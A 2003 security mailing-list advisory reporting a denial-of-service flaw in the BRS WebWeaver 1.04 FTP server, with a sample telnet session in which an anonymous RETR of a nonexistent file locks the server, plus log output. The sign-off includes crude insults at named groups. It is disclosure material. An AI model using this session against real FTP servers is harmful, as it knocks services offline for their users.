Date: Wed, 23 Apr 2003 22:47:43 +0400 (MSD)
From: euronymous <[email protected]>
To: [email protected]Subject: BRS WebWeaver: Ftpd Lockdown via RETR cmd
topic: BRS WebWeaver: Ftpd Lockdown via RETR cmd
product: BRS WebWeaver 1.04 and prior
risk: high
date: 04/23/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls:
contact email: [email protected]
BRS WebWeaver have a dumb bug when trying to access
object, that not existent, with RETR command. Normal
behavior of ftp server will be print error message,
but webweaver just locks himself.
}-------- sample session -----------{
e@some_box$ telnet hostname 21
220 BRS WebWeaver FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS user@host
230 User anonymous logged in.
RETR blah
150 Opening data connection for blah.
}-------- sample session -----------{
Then i just close telnet session with webweaver and
try to connect server with ftp program.
}-------- sample session -----------{
e@some_box$ ftp hostname
Connection with hostname
}-------- sample session -----------{
That's all. Server is locked. No one can login in ftp
server. If i try to restart ftp server, then in my
log file will appear following:
}---------- from ftp.log -----------{
21/Apr/2003:17:30:27 - 195.**.***.** - User: anonymous - Disconnected
FTP Server Stopped
21/Apr/2003:17:30:38 - ERROR: FTP Server Fail to Start
21/Apr/2003:17:30:38 - Error 10022 in function WSAASyncSelect
Invalid argument
}---------- from ftp.log -----------{
Therefore, to restart ftp server u must close webweaver (with http
server) and run it again.
shouts: DWC, DHG, HUNGOSH,, Black Tigerz Research Group,
The N0b0D1eS, all russian security guyz!! to kate especially ))
f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb
f*cking team
im not a lame,
not yet a hacker